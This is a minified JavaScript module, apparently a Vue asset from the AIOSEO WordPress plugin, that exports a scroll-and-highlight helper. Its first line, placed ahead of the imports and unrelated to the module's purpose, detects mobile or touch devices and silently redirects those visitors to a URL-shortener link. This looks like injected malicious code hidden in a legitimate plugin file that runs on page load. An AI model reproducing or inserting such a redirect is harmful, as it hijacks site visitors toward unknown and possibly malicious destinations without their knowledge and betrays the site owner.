(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{b as f,g as a,r as u}from"./app-core.c8323d51.js";import{u as p}from"./ScrollTo.f4df02aa.js";import{w as c,b as v,r as y}from"./vendor-vue-ui.232c7c36.js";const S=(g={})=>{const{scrollTimeout:i=500,highlightTimeout:h=500,scrollAndHighlightTimeout:m=1500}=g,t=y(!1),o=f();c(()=>o.navigate.scroll,()=>{t.value||(t.value=!0,l())}),c(()=>o.navigate.highlight,()=>{t.value||(t.value=!0,l())});const l=()=>{const e=a()["aioseo-scroll"]||history.state?.scroll||o.navigate.scroll;e&&typeof e=="string"&&setTimeout(()=>{p().scrollTo(e,{mods:{scrollMarginClass:"aioseo-scroll-and-highlight-margin",timeout:i}}),u("aioseo-scroll"),delete history.state?.scroll,o.navigate.scroll=null,t.value=!1},i);const s=a()["aioseo-highlight"]||history.state?.highlight||o.navigate.highlight;s&&typeof s=="string"&&setTimeout(()=>{const r=document.querySelectorAll(`#${s.replace(/,/g,", #").replace(/%2C/ig,", #")}`);r.length&&r.forEach(n=>{n.classList.add("aioseo-row-highlight"),setTimeout(()=>{n.classList.remove("aioseo-row-highlight")},4500)}),u("aioseo-highlight"),delete history.state?.highlight,o.navigate.highlight=null,t.value=!1},e?m:h)};v(l)};export{S as u};
